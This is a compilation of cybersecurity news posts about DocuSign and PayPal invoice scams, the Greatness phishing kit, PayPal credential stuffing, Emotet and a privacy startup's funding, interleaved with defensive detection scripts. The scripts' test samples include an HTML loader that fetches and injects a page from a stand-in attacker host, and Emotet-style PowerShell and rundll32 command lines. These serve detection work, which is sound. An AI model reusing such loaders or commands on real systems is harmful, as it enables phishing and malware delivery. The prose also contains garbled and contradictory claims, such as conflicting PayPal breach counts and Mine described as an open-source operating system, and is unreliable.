
Fake Invoices Spread Through DocuSign’s API in New Scam

Cyber thieves are abusing DocuSign's Envelopes API to send fake invoices that impersonate well-known brands such as Norton and PayPal. Because the messages come from a verified domain - DocuSign's own - they pass traditional email security checks and reach inboxes without being flagged as malicious.

How It Works

DocuSign is an electronic signing service used to send, sign, and manage documents digitally. Through the Envelopes API in its eSignature system, document requests can be sent, signed, and tracked entirely automatically. Attackers have found a way to turn this API against recipients: they sign up for legitimate paid DocuSign accounts, which give them access to the templates and branding features, and use those to build fake invoices that are almost indistinguishable from official ones sent by established companies.

These scammers use the "Envelopes: create" function to send enormous numbers of fake bills to huge recipient lists. In most cases the amounts on the bill are realistic, which makes it appear more legitimate. The attackers instruct the user to "sign" the document and then use the signed document to request payment. In other instances, attackers forward the "signed" document directly to the victim's finance department to complete the scam.


Mass Abuse of the DocuSign Platform

According to the security research firm Wallarm, this type of abuse has been ongoing for some time. The company noted that the mass exploitation has been exposed by DocuSign customers themselves, who have posted complaints on online forums about constant spam and phishing emails arriving from the DocuSign domain. "I'm suddenly receiving multiple phishing emails per week from docusign.net, and there doesn't seem to be an obvious way to report it," complained one user.

The volume of complaints implies that the abuse occurs on a very large scale, which makes it likely that the attackers distribute the false invoices with automation tools rather than by hand.

Wallarm has already reported the abuse to DocuSign, but it is not clear what actions, if any, DocuSign is taking to resolve the issue.


Challenges in Safeguarding APIs Against Abuse

The widespread abuse of the DocuSign Envelopes API shows how open access can compromise the security of API endpoints. Although the service is intended for verified businesses, attackers simply buy valid accounts and use the functions the API offers for malicious purposes. DocuSign is not an isolated case; several other companies have seen the same kind of API abuse. For instance, attackers have used APIs to check millions of phone numbers against Authy accounts to validate them, to scrape information about millions of Dell customers, to match millions of Trello accounts with email addresses, and more.

The DocuSign case shows how abuse of a platform justifies stronger protections for digital services that expose sensitive tools. Because API-based attacks have become so widespread, firms like DocuSign may be forced to watch more closely for misuse of their products and to tighten controls on paid accounts that give users full access to the tools at their disposal.


Unlocking Data Privacy: Mine's No-Code Approach Nets $30 Million in Funding

Mine Inc., an Israeli data privacy company, has announced a $30 million Series B round led by Battery Ventures and PayPal Ventures, together with the investment arm of US insurance giant Nationwide as a third investor. Existing investors Gradient Ventures (Google's AI fund), Saban Ventures, MassMutual Ventures, and Headline Ventures also joined the round.

Using artificial intelligence, and specifically natural language processing, Mine scans your inbox to identify which companies hold your personal information and lets you ask them to delete data they have no reason to keep.

Concern about GDPR was widespread at the time, and the product attracted a lot of interest: initially free, the startup gained about 5 million users in just a few weeks. The company then expanded its user base to business users and enterprise applications.

From a scan of a user's inbox and log-ons, Mine can map every place where the end user is installing and using customer or business data. This struck a chord with the privacy officers responsible for keeping companies compliant with privacy rules.

Some 150 clients use Mine's data privacy and disclosure solutions to protect their data, including Reddit, HelloFresh SE, Fender, Guesty, Snappy, and Data.ai. The capital will fund the company's ongoing operations in the coming years and the expansion of its global operations, including bringing the MineOS B2B platform to the US and extending its offerings to the enterprise market.

With 35 employees, the company is in the process of hiring dozens of developers, QA professionals, and machine learning professionals to be based in Israel. Founded in 2019, Mine is a company headquartered in Tel Aviv, with the company's founding members being CEO Gal Ringel, CTO Gal Golan, and CPO Kobi Nissan.

Since its founding, the company's vision has been to make privacy regulations easy for companies and individuals to navigate. Over the past two years that vision has sharpened around its MineOS B2B platform, which aims to give a company a Single Source of Truth (SSOFT) for the data within its organization, so it can identify which systems, assets, and data it holds.

This process, known as Data Mapping, is one of the most important building blocks in any organization and serves as a basis for many teams, including legal and privacy, data, engineering, IT, and security teams. As Ringel said, "The funding was complete at the end of the second week of October, just one week after the war had begun."

As a result of the difficult market conditions of the past year, we have managed the company very carefully and with discipline since March last year, reducing monthly expenses while boosting revenue significantly to a rate of millions of dollars in annualized return on equity (4x growth in 2023), which has allowed us to achieve extraordinary metrics that have attracted many investors to the company.

There is no doubt that mineOS is one of the greatest open-source operating systems out there; it has hundreds of enterprise customers, including Reddit, HelloFresh SE, FIFA and Data.ai, and it has announced $30 million in Series B funding to continue its development. The round has two leads, Battery Ventures (from the financial giant) and PayPal Ventures (from the payments giant), joined by all of the previous backers, including Saban Ventures, Gradient Ventures (Google's AI fund), MassMutual Ventures, and Headline Ventures.

Although Mine has not disclosed its valuation, the co-founder and CEO, Gal Ringel, told me during his recent interview that the company has increased in valuation three times since its last fundraising back in 2020. (The previous round was $9.5 million after the company had only 100,000 users and no revenue.) Mine has raised over $42.5 million in funding. 

Part of the new funding will go to sales development around Mine's current offerings and to R&D. Mine intends to launch two new products in Q1 that cater to the explosion in interest in artificial intelligence. One is designed for data privacy officers preparing to comply with the artificial intelligence laws regulators plan to adopt shortly. Mine is not alone in the data protection tools market, nor should it be.

Because the feature sits close to other data protection activities, it is more likely to be challenged by other companies in the same arena – for instance, OneTrust, which offers GDPR and consent gate solutions for websites, and BigID, which provides a comprehensive set of compliance tools for data usage. Ringel said Mine has a strong competitive advantage over these because it is designed to be user-friendly, so it can be adopted and used even by people with no technical background.

Convincing Phishing Pages are Now Possible With Phishing-as-a-Service

In several phishing campaigns since mid-2022, a previously unknown phishing-as-a-service (PaaS) offering named "Greatness" has been used as a backend component for various spam campaigns. Greatness includes features found in some of the most advanced PaaS offerings, such as MFA bypass, IP filtering, and integration with Telegram bots.

Phishing attacks are mostly social engineering attacks. Depending on who conducts the attack, they can target a wide range of people. There is a possibility that these emails are spam or scam emails looking to access PayPal accounts. 

Phishing can also be an attack targeted at a particular individual. Attackers often tailor their emails to speak directly to you and include information only an acquaintance would have, information they usually obtain after gaining access to your data. Even a very cautious recipient finds it very difficult to avoid becoming a victim when an email of this kind arrives. Based on research conducted by PhishMe Research, over 97% of all fraudulent emails sent to consumers contain ransomware.

As a result of the availability of phishing kits like Greatness, threat actors, rookies, and professionals alike, now can design convincing login pages that comply with the account registration process of various online services while bypassing the two-factor authentication protections offered by the service.

As a result, the fake pages, which appear authentic, act as a proxy that lets the attacker harvest the credentials and time-based one-time passwords (TOTPs) victims enter.

In addition to the possibility of conducting phishing through text messages, social media, and phone calls, the term 'phishing' is most commonly used in the context of attacks that appear via email. Oftentimes, phishing emails can reach thousands of users directly and disguise themselves among the myriad of benign emails that are received by busy users every day. As a result of attacks, malicious code may be installed on systems (such as ransomware), systems may be sabotaged, and intellectual property may be stolen. 

For now, Greatness is limited to Microsoft 365 phishing pages, and its attachment and link builder lets affiliates create highly convincing decoy and login pages. The pages pre-fill the victim's email address and show the appropriate company logo and background image, taken from the real Microsoft 365 login page of the victim's organization. This level of sophistication makes Greatness a particularly attractive option for phishing operators.

A geographic analysis of the targets in a number of campaigns, ongoing and past, found the majority of victims to be companies based in the U.S., U.K., Australia, South Africa, and Canada, with manufacturing, health care, and technology being the most frequently targeted sectors. The exact distribution of victims by sector and location differs slightly from campaign to campaign.

Affiliates who deploy and configure the Greatness phishing kit can use its more advanced features without technical knowledge, so even unskilled operators benefit from them. Greatness has two parts: the phishing kit the affiliate deploys, and an API the kit works with to mount a "man-in-the-middle attack" against the victim's login.

In its latest survey, the "Cyber Security Breaches Survey 2021", the UK government reports that phishing remains the "most common attack vector" in attack attempts against organizations' systems. Phishing continues to be used because it continues to succeed: up to 32% of employees click a link in a phishing email, while up to 8% of employees are unaware of the sending.

The risk of a data breach or malware infection is greatly increased when an individual clicks on a link in a phishing email and then enters their login credentials to access company resources. There are always going to be several levels of privilege escalation, even when an employee has lower access privileges. Cybercriminals put a lot of effort into making their phishing attack vector as convincing as possible to increase their chances of success. 

With the emergence of Greatness, Microsoft 365 users are at higher risk of compromise, because phishing pages can be made more convincing and effective against businesses. According to data collected by Cisco Talos, approximately 90% of Greatness affiliates target businesses. A study of the targeted organizations across several campaigns indicates that manufacturing is the sector given the most attention, followed by healthcare and technology.

The threat was first observed during mid-2022, and according to VirusTotal, a spike in activity was experienced in December 2022 and March 2023. This was a time when attachment samples increased considerably. 

As part of the attack chain, malicious emails often contain HTML attachments that execute on opening. They carry obfuscated JavaScript that redirects the recipient to a landing page with their email address pre-filled and prompts them for a password and a two-factor authentication code.

The credentials entered are forwarded to the affiliate's Telegram channel and then used to gain unauthorized access to the accounts.

If a victim opens the HTML attachment, the browser executes a small piece of JavaScript that connects to the attacker's server to retrieve the HTML of the phishing page, which the server then displays in the same browser window. While this happens, the page shows a spinning-wheel image over a blurred document, pretending that the document is loading.
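The HTML-attachment stage just described (a near-empty page whose script decodes a hidden URL, fetches the real phishing page and writes it into the same window) leaves static fingerprints that a mail gateway can look for before the browser ever runs it. The following is an added example written for this page, not code from Cisco Talos or from the Greatness kit: a small heuristic scanner over attachment HTML. The indicator lists, weights and threshold are assumptions chosen for the example, and both sample documents are constructed.

```python
import base64
import re

# Heuristic indicator lists for the staging page described above. These are
# choices made for this example, not a vendor rule set.
OBFUSCATION = [r"\batob\s*\(", r"\bunescape\s*\(", r"\beval\s*\(",
               r"String\.fromCharCode", r"(?:\\x[0-9a-fA-F]{2}){8,}"]
REMOTE_LOAD = [r"\bfetch\s*\(", r"\bXMLHttpRequest\b", r"\blocation\.(?:href|replace)\b"]
DOM_INJECT = [r"\bdocument\.write\b", r"\binnerHTML\s*=", r"\bdocument\.open\b"]
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
TAG_RE = re.compile(r"<[^>]+>")


def analyze_html_attachment(doc: str) -> dict:
    """Return a heuristic score and the indicators that fired for one HTML attachment."""
    scripts = SCRIPT_RE.findall(doc)
    if not scripts:
        return {"score": 0, "indicators": []}  # static HTML cannot stage a remote page
    js = "\n".join(scripts)
    indicators, score = ["script"], 1
    if any(re.search(p, js) for p in OBFUSCATION):
        indicators.append("obfuscation"); score += 2
    if any(re.search(p, js) for p in REMOTE_LOAD):
        indicators.append("remote-load"); score += 2
    if any(re.search(p, js) for p in DOM_INJECT):
        indicators.append("dom-injection"); score += 2
    if BASE64_BLOB.search(js):
        indicators.append("base64-blob"); score += 1
    # Text a reader would actually see: strip scripts, then tags. A staging page
    # shows almost nothing except the spinner image.
    visible = TAG_RE.sub(" ", SCRIPT_RE.sub(" ", doc))
    if len(visible.split()) < 20:
        indicators.append("little-visible-content"); score += 1
    return {"score": score, "indicators": indicators}


def verdict(doc: str, threshold: int = 5) -> str:
    return "suspicious" if analyze_html_attachment(doc)["score"] >= threshold else "benign"


# --- Constructed samples (not real captures) ---
_STAGER_URL_B64 = base64.b64encode(b"https://attacker.invalid/page?id=123").decode()
MALICIOUS_SAMPLE = f"""<!DOCTYPE html><html><body>
<img src="data:image/gif;base64,R0lGODlhAQABAAAAACwAAAAAAQABAAA=" alt="loading">
<script>
var u = atob("{_STAGER_URL_B64}");
fetch(u).then(function (r) {{ return r.text(); }})
        .then(function (t) {{ document.open(); document.write(t); document.close(); }});
</script></body></html>"""

BENIGN_SAMPLE = """<html><body><h1>Invoice 1042</h1>
<table><tr><td>Consulting services, March</td><td>$1,200.00</td></tr></table>
<p>Please remit payment within 30 days. Thank you for your business.</p></body></html>"""

if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, verdict(doc), analyze_html_attachment(doc))
```

The score is deliberately additive: a single `atob(` call in a legitimate attachment is not enough to quarantine it, but decode plus remote fetch plus `document.write` into an otherwise empty page is the exact shape of the loader the post describes. In production the same checks would run on the extracted attachment after MIME decoding, and the threshold would be tuned against a corpus of the organization's own benign HTML mail.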

The PaaS then connects to Microsoft 365 and impersonates the victim to log in to the victim's account. If the service detects that MFA is in use, it prompts the victim to authenticate with their chosen MFA method (e.g., SMS code, voice call code, or push notification, according to the website).

Once the service receives the MFA code, it continues to impersonate the victim behind the scenes to complete the login and collect the authenticated session cookies for the victim's account. Affiliates then receive these through their Telegram channel or by email directly from the web panel, depending on which method they chose.

Working in conjunction with the API, the phishing kit mounts a "man-in-the-middle" attack: it asks the victim for information, passes it to the legitimate login page in real time, and the API logs it.

Even if the victim uses MFA (multi-factor authentication), the PaaS affiliate can steal the username and password for the account as well as the authenticated session cookies. This is one reason the Telegram bot is used: it notifies the attacker about valid cookies as soon as possible so they can move quickly if the target looks interesting. Authenticated sessions typically expire after a while, which is another reason the bot is used.

PayPal Users Should Check Their Accounts

It seems that scammers never cease trying to con people. Keeping customers' information private and secure is of the utmost importance to companies, so they use many ways to protect against a breach in their network. 

Despite these digital blockades, hackers have tried to figure out ways to get around them. As the world learns more about the use of technology, the methods criminals employ to commit theft are also improving. 

Until a few years ago, banks and credit card companies were plagued by much more serious issues related to ID theft than they are today. 

There is the potential for a data breach to occur at any time. Banks and credit card companies must comply with higher standards of data security than companies in the private sector.  

Only a company can take all the necessary steps to safeguard the data of its customers and employees. Login and password restrictions are among the most annoying things customers face when using a company's services. If you are concerned about the security of your personal information, one of the most effective protections is not to use your e-mail address as your login username.

Customers who do so are even more vulnerable to hacking attempts. To keep your password secure, never reuse it. When a company's login portal tells you that you cannot use a password you have used before, that is intended to protect you, not to annoy you, however frustrating it is.

That message appears when you try to reuse a password on the company's portal. Reusing passwords puts you at risk from hackers. Despite the inconvenience of a unique login and password, it is better than facing the consequences of identity theft or other financial scams.

The PayPal System Has Not Been Hacked

There is no need to panic, even though the headlines may lead you to believe PayPal has been hacked. The company's network has not been compromised. The scam was carried out through credential stuffing: hackers try many login combinations to find the ones that work, using password-guessing techniques to discover valid logins. In other words, it is a kind of onslaught against the network, but it does not break the system that protects the company's information and assets. A scammer obtains usernames from other companies, which may or may not be as secure as the one being targeted, and cross-checks those usernames against it.

A company that cleans houses and gives customers a login username and password will not have the same kind of data protection as PayPal (PYPL), which was designed to protect its users and data robustly. Hackers have a much higher chance of breaking into the less secure company's data network, and the same login username is used for both PayPal and the cleaning company's customer portal.

In this way the hacker gains access to passwords. Hackers use the data they collect to break into broader, safer networks; access to this kind of data gives them more opportunities to break into other websites and steal their data.

A unique username and password is only one hurdle scammers must overcome to gain access to a site. Two-factor authentication does not guarantee that crooks cannot get through, but it will at least slow them down. About 35,000 PayPal accounts were hacked by these scammers in December after they acquired authentic usernames for those accounts.

PayPal Can Assist in Repairing Breached Accounts  

Following this latest credential-stuffing attack, PayPal has contacted 34,942 customers whose accounts were compromised and explained how they can better protect themselves and their accounts against cyberattacks now and in the future. The accounts were compromised by an attacker sometime between the 6th and 8th of December last month; the breach was not noticed until mid-December.

It is also imperative that customers use unique usernames and passwords for all of their online accounts. While keeping original passwords and usernames is time-consuming and sometimes inconvenient, it is also one of the easiest and most cost-effective ways to protect one's digital identity and personal information. As reported by CNET, PayPal has also offered affected accounts two years of free identity theft monitoring by Equifax.

A Credential Stuffing Attack Breaches PayPal Accounts

In December last year, hackers accessed the PayPal accounts of more than 1.6 million users of the online payment service. As a result, PayPal is now sending out data breach notifications to affected users. 

A large number of customer accounts of the company were compromised in this attack. With the help of credential stuffing, the hackers behind this attack were able to gain access to almost 35,000 accounts of this company. 

PayPal sent out a Warning of Security Incidents to affected customers on December 6th and 8th of last year. The warning stated that the attack took place from December 6th to 8th. When it took place, the company was able to detect it and implement the necessary steps to mitigate it. PayPal has also launched an internal investigation into how the hackers were able to gain access to customers' accounts in the first place.

Although the company says the hackers were unable to carry out any transactions through the breached accounts, a lot of sensitive information about affected customers was stolen, including full names, dates of birth, physical addresses, Social Security numbers, and tax identification numbers.

Based on PayPal's investigation, the hackers used credential stuffing to access the accounts of PayPal's customers by gaining access to the credentials of PayPal's employees. Credential stuffing is a popular attack method that relies on credentials already circulating on the dark web; unlike a data breach, it uses account credentials that are already in circulation.

Credential-stuffing attacks are often carried out with bots programmed to enter usernames and passwords taken from data breaches until one cracks an account. The bots try the same credentials across multiple online services in the hope that the passwords have not been changed recently.

Using the same password across multiple accounts is dangerous. A hacker who obtains your password by infiltrating one website or service can then use that same password to access the rest of your accounts.
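The bot behaviour described in the last two paragraphs has a telltale shape in authentication logs: one source tries many different usernames with a high failure rate, whereas a real user who has forgotten a password fails repeatedly against a single account. The following is an added example written for this page, not PayPal's detection logic or any vendor's: a small detector over constructed key=value auth-log lines. The log format, thresholds and the sample IPs and usernames are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed log format for this example (not a real PayPal log): one line per attempt.
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+ip=(?P<ip>\S+)\s+user=(?P<user>\S+)\s+result=(?P<result>OK|FAIL)$"
)


def parse_auth_log(lines):
    """Yield a dict per well-formed line; anything else is skipped silently."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def detect_credential_stuffing(lines, min_distinct_users=5, min_fail_ratio=0.75):
    """Flag source IPs that attempt many *different* usernames with mostly failures.

    A legitimate user mistyping a password produces several failures for ONE
    account; a bot replaying breached username/password pairs produces one or
    two attempts for MANY accounts. A success from a flagged IP is a likely
    takeover and should trigger a forced password reset on that account.
    """
    stats = defaultdict(lambda: {"users": set(), "fails": 0, "total": 0, "ok_users": set()})
    for ev in parse_auth_log(lines):
        s = stats[ev["ip"]]
        s["total"] += 1
        s["users"].add(ev["user"])
        if ev["result"] == "FAIL":
            s["fails"] += 1
        else:
            s["ok_users"].add(ev["user"])

    flagged = {}
    for ip, s in stats.items():
        ratio = s["fails"] / s["total"]
        if len(s["users"]) >= min_distinct_users and ratio >= min_fail_ratio:
            flagged[ip] = {
                "distinct_users": len(s["users"]),
                "fail_ratio": round(ratio, 3),
                "likely_takeovers": sorted(s["ok_users"]),
            }
    return flagged


# Constructed sample: one spraying source, two ordinary users, one malformed line.
SAMPLE_LOG = [
    "2022-12-06T03:14:22Z ip=198.51.100.23 user=alice result=FAIL",
    "2022-12-06T03:14:23Z ip=198.51.100.23 user=bob result=FAIL",
    "2022-12-06T03:14:24Z ip=198.51.100.23 user=carol result=OK",
    "2022-12-06T03:14:25Z ip=198.51.100.23 user=dave result=FAIL",
    "2022-12-06T03:14:26Z ip=198.51.100.23 user=erin result=FAIL",
    "2022-12-06T03:14:27Z ip=198.51.100.23 user=frank result=FAIL",
    "2022-12-06T03:14:28Z ip=198.51.100.23 user=grace result=FAIL",
    "2022-12-06T03:14:29Z ip=198.51.100.23 user=heidi result=FAIL",
    "2022-12-06T03:20:01Z ip=203.0.113.7 user=alice result=OK",
    "2022-12-06T03:21:10Z ip=203.0.113.9 user=bob result=FAIL",
    "2022-12-06T03:21:25Z ip=203.0.113.9 user=bob result=FAIL",
    "2022-12-06T03:21:40Z ip=203.0.113.9 user=bob result=OK",
    "this line is not an auth event and is ignored",
]

if __name__ == "__main__":
    for ip, info in detect_credential_stuffing(SAMPLE_LOG).items():
        print(ip, info)
```

Per-IP counting is the simplest form of the check; a bot operator who spreads attempts across a proxy pool defeats it, which is why production systems also look at the global ratio of failed logins to distinct usernames over a short window, and at successes that arrive from a device or network the account has never used before.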

When your PayPal account is hacked, what should you do next? 

If PayPal has notified you that your account was breached and that you must reset your password, the company has already reset it. It is recommended that you create a strong, complex, and distinct password the next time you log in so that your account remains safe. A password manager such as KeePass can generate strong passwords for you and store them; many such tools also let users generate passwords online for free.

To protect you from identity theft, PayPal is offering two years of free identity monitoring from Equifax, covering your name, birth date, address, and Social Security number. If you wish to extend your protection further, you may want to sign up for an identity theft protection service.

It is also recommended that you enable two-factor authentication for your PayPal account, which will help prevent a hacker from gaining access to your account even if they obtain your login credentials, which can be crucial to the safety and security of your account. 

Despite the many risks involved, password reuse is still one of the biggest problems in the online world but hopefully, this unfortunate incident will get people to use strong, complex, and unique passwords - especially when it comes to their financial accounts. 

PayPal Invoices Used for Data Theft

The past few months have seen an increase in convincing phishing emails produced by abusing PayPal's invoice system. Scammers are constantly seeking new ways to steal your personal information or money.

Hackers send bogus invoices through PayPal's website using a free PayPal account they have registered. The emails' bodies carry spoofed logos of companies like Norton to make recipients believe they are authentic.

Emails from PayPal will likely land in your inbox rather than your spam folder because they are not regarded as spam. Because it comes from a real PayPal account, the email appears trustworthy, so users are advised to stay cautious and not fall for it. Paying the charge buys no service; the cybercriminals receive your money and use it for their own gain.

The PayPal invoices feature statements like "thank you for purchasing Norton Security Premium package, if you have not authorized this transaction, please call us with your credit card details." They resemble a related fraud that employed phony Quickbooks invoices and was disclosed earlier this month.

The scam, often known as a "double spear" assault, prompts users to call the number, at which point hackers attempt to get them to pay the invoice and steal their credit card information.

Phishing efforts are frequent and come in a variety of shapes, according to a written statement from PayPal.

PayPal stated that it has a zero-tolerance policy for attempted fraud on the platform and that its team is working relentlessly to protect its consumers.

"We are aware of this well-known phishing scheme and have added more measures to help mitigate this particular incidence," the company said. "Nevertheless, we advise clients to exercise constant vigilance online and to get in touch with Customer Service immediately if they believe they are a victim of a scam."

It's astonishing how well-adapted modern fraudsters are at using the very same technologies that financial institutions have long utilized to provide their consumers a sense of security while dealing online. 

Today's scammers seem more interested in taking over your entire computer and online life with remote administration software than in stealing your PayPal password, which nonetheless remains at the center of the majority of frauds these days.

Users are advised to follow the guidelines given below in order to safeguard themselves against the aforementioned scam. 
  • Don't rely on email spam filters alone to keep phishing emails from reaching you. Examine emails for warning signs, such as impending deadlines and scare tactics, to spot potential phishing fraud.
  • Use a recognized phone number or email address to get in touch with the service provider directly to confirm the validity of an invoice. To get in touch with the service provider, do not utilize the phone number or link provided in the invoice.
  • The simple notion that an email was delivered via a reputable website should not be used as proof of its validity. To make their schemes seem more credible, cybercriminals can exploit reliable websites.
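The DocuSign post above and this PayPal post describe the same trick: an invoice is created on a legitimate platform, so it arrives from the platform's own authenticated domain, but it carries a different company's branding and a phone number the victim is urged to call. The third bullet above makes the point that the sending domain alone proves nothing. The following is an added example written for this page, not code from DocuSign, PayPal or the post's author: a scoring function that applies that reasoning to a notification's sender name, subject and body. The platform and brand lists, the lure phrases, the weights and threshold, and all three sample messages are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Platforms that send mail on their customers' behalf from their own domain. Mail from
# them passes SPF/DKIM, so the domain says nothing about who built the invoice. (Assumed.)
PLATFORM_DOMAINS = {"docusign.net", "docusign.com", "paypal.com"}
# Brands the posts report being impersonated in such invoices, plus common lures. (Assumed.)
IMPERSONATED_BRANDS = {"norton", "paypal", "mcafee", "geek squad", "quickbooks"}
# Phrases that steer the recipient to phone a number printed in the invoice. (Assumed.)
CALLBACK_LURES = [r"\bcall (?:us|our|the)\b", r"(?:did|have) not authori[sz]e",
                  r"\bto cancel\b", r"\brefund\b"]
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)


def sender_domain(addr: str) -> str:
    return addr.rstrip(">").rsplit("@", 1)[-1].lower()


def foreign_brands(text: str, domain: str) -> list:
    """Brands named in text that do not belong to the sending platform itself."""
    return sorted(b for b in IMPERSONATED_BRANDS if b in text and b not in domain)


def score_invoice(msg: dict) -> Verdict:
    """Score a platform-relayed notification for third-party brand impersonation."""
    v = Verdict()
    domain = sender_domain(msg["from"])
    if domain not in PLATFORM_DOMAINS:
        return v  # the heuristic only applies to mail relayed by a platform
    name = msg.get("from_name", "").lower()
    text = (msg["subject"] + "\n" + msg["body"]).lower()
    if foreign_brands(name, domain):
        v.score += 2
        v.reasons.append(f"sender display name carries another brand: {foreign_brands(name, domain)}")
    if foreign_brands(text, domain):
        v.score += 2
        v.reasons.append(f"invoice text names another brand: {foreign_brands(text, domain)}")
    phones = PHONE_RE.findall(text)
    lures = [p for p in CALLBACK_LURES if re.search(p, text)]
    if phones and lures:
        v.score += 3
        v.reasons.append("phone number combined with a call-back lure")
    elif phones:
        v.score += 1
        v.reasons.append("phone number present")
    return v


def classify(msg: dict, threshold: int = 4) -> str:
    return "suspicious" if score_invoice(msg).score >= threshold else "benign"


# --- Constructed sample notifications (not real messages) ---
DOCUSIGN_SCAM = {
    "from": "dse@docusign.net", "from_name": "Norton LifeLock Billing",
    "subject": "Invoice for Norton Security Premium",
    "body": "Thank you for purchasing Norton Security Premium. If you did not authorize "
            "this transaction, call us at 1-800-555-0199 to cancel.",
}
DOCUSIGN_LEGIT = {
    "from": "dse@docusign.net", "from_name": "Acme Corp via DocuSign",
    "subject": "Please DocuSign: Master Services Agreement",
    "body": "Acme Corp has sent you a document to review and sign.",
}
PAYPAL_SCAM = {
    "from": "service@paypal.com", "from_name": "PayPal",
    "subject": "Invoice from Geek Squad",
    "body": "Your Geek Squad renewal of $399.99 is complete. For a refund call us at "
            "(888) 555-0142 within 24 hours.",
}

if __name__ == "__main__":
    for label, m in (("docusign scam", DOCUSIGN_SCAM), ("docusign legit", DOCUSIGN_LEGIT),
                     ("paypal scam", PAYPAL_SCAM)):
        print(label, classify(m), score_invoice(m))
```

The `b not in domain` check is what keeps a genuine PayPal notification that mentions PayPal from scoring, while a PayPal-relayed invoice that talks about Geek Squad or Norton does score. The phone-plus-lure rule carries the most weight because it is the part of the scam that actually extracts money: the recipient is meant to call, not to click, which is exactly why URL-based filters miss these messages.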

Emotet : The Infamous Botnet Has Returned

Kaspersky researchers were able to retrieve and analyze 10 out of 16 modules, most of which have been used by Emotet in the past in one form or another. Kaspersky Lab was founded in 1997 as a multinational cybersecurity and digital privacy company. Kaspersky's deep threat intelligence and security expertise are continually evolving into new security solutions and services to safeguard enterprises, critical infrastructure, governments, and consumers all around the world.

Emotet was first discovered in the wild in 2014. Its major purpose then was to steal users' financial credentials. Since then, it has gone through several modifications, began delivering other malware, and eventually evolved into a powerful botnet. Emotet is classified as a banking Trojan. Malspam, spam email carrying malware, is its most common means of propagation. To persuade users, these messages frequently carry familiar branding, imitating the email layout of well-known and trusted companies such as PayPal or DHL.

As per Kaspersky telemetry, the number of victims increased from 2,843 in February 2022 to 9,086 in March 2022, meaning the attackers targeted more than three times as many users. Accordingly, the number of threats detected by Kaspersky solutions increased from 16,897 in February 2022 to 48,597 in March 2022.

A typical Emotet infection starts with spam e-mails carrying Microsoft Office attachments with malicious macros. The macro launches a malicious PowerShell command that drops and starts a module loader, which then talks to a command-and-control server to download and start modules. In the %Windows%\SysWOW64 or %User%\AppData\Local directory, Emotet creates a subfolder with a random name and copies itself there under a completely random name and extension. The exported Control_RunDLL function is used to launch the Emotet DLL's primary activity. The downloaded modules can carry out a range of actions on the infected computer. Kaspersky researchers were able to extract and evaluate 10 of the 16 modules, the majority of which had previously been used by Emotet.
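Two steps of the infection chain just described are visible in ordinary process-creation telemetry: an Office application spawning PowerShell (the macro stage), and rundll32 invoking Control_RunDLL on a file sitting in a random-named subfolder of %User%\AppData\Local or SysWOW64 with an arbitrary extension (the persistence layout). The following is an added example written for this page, not Kaspersky's detection logic: two rules over constructed process-creation events in a Sysmon-like shape. The event field names, the regex, the Office process list and every sample path and command line are assumptions made for the example.

```python
import re

# Rule 1: an Office application spawning PowerShell (the macro stage). Assumed list.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
ENCODED_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)

# Rule 2: rundll32 calling Control_RunDLL on a file in a *subfolder* of %LOCALAPPDATA%
# or SysWOW64. Legitimate control-panel DLLs live directly in System32/SysWOW64, not
# in a random-named subfolder, so the extra path component is the discriminator.
RUNDLL_RE = re.compile(
    r"""(?P<base>[a-z]:\\users\\[^\\]+\\appdata\\local|%localappdata%|[a-z]:\\windows\\syswow64)
        \\(?P<dir>[^\\,\s]+)\\(?P<file>[^\\,\s]+)\s*,\s*control_rundll""",
    re.I | re.X,
)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_emotet_rules(events):
    """Return (event_index, rule_name, detail) for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        parent = basename(ev["parent_image"])
        image = basename(ev["image"])
        cmd = ev["command_line"]

        if parent in OFFICE_PARENTS and image in POWERSHELL_IMAGES:
            detail = "encoded command" if ENCODED_FLAG_RE.search(cmd) else "plain command"
            hits.append((i, "office-spawned-powershell", detail))

        if image == "rundll32.exe":
            m = RUNDLL_RE.search(cmd)
            if m:
                fname = m.group("file")
                ext = fname.rsplit(".", 1)[-1].lower() if "." in fname else ""
                detail = f"{m.group('dir')}\\{fname}"
                if ext not in ("dll", "cpl"):
                    detail += " (non-DLL extension)"
                hits.append((i, "rundll32-control_rundll-random-path", detail))
    return hits


# Constructed events (not real telemetry). The encoded command is a placeholder.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc <BASE64_PLACEHOLDER>"},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Users\bob\AppData\Local\Xqzrtu\hkwrel.ytk,Control_RunDLL"},
    {"parent_image": r"C:\Windows\explorer.exe",            # benign: real control panel applet
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\desk.cpl"},
    {"parent_image": r"C:\Windows\explorer.exe",            # benign: admin-run script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for hit in match_emotet_rules(SAMPLE_EVENTS):
        print(hit)
```

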